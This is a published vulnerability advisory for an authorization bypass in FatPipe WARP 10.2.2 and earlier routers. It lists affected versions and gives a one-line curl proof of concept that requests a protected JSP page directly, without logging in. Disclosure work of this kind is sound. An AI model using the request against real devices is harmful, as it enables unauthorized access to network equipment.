# Exploit Title: FatPipe Networks WARP 10.2.2 - Authorization Bypass # Date: 25.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.fatpipeinc.com FatPipe Networks WARP 10.2.2 Authorization Bypass Vendor: FatPipe Networks Inc. Product web page: https://www.fatpipeinc.com Affected version: WARP 10.2.2r38 10.2.2r25 10.2.2r10 10.1.2r60p82 10.1.2r60p71 10.1.2r60p65 10.1.2r60p58s1 10.1.2r60p58 10.1.2r60p55 10.1.2r60p45 10.1.2r60p35 10.1.2r60p32 10.1.2r60p13 10.1.2r60p10 9.1.2r185 9.1.2r180p2 9.1.2r165 9.1.2r164p5 9.1.2r164p4 9.1.2r164 9.1.2r161p26 9.1.2r161p20 9.1.2r161p17 9.1.2r161p16 9.1.2r161p12 9.1.2r161p3 9.1.2r161p2 9.1.2r156 9.1.2r150 9.1.2r144 9.1.2r129 7.1.2r39 6.1.2r70p75-m 6.1.2r70p45-m 6.1.2r70p26 5.2.0r34 Summary: FatPipe Networks invented the concept of router-clustering, which provides the highest level of reliability, redundancy, and speed of Internet traffic for Business Continuity and communications. FatPipe WARP achieves fault tolerance for companies by creating an easy method of combining two or more Internet connections of any kind over multiple ISPs. FatPipe utilizes all paths when the lines are up and running, dynamically balancing traffic over the multiple lines, and intelligently failing over inbound and outbound IP traffic when ISP services and/or components fail. Desc: Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources behind protected pages. Tested on: Apache-Coyote/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5682 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php 30.05.2016 25.07.2021 -- $ curl -vk "https://10.0.0.9/fpui/jsp/index.jsp"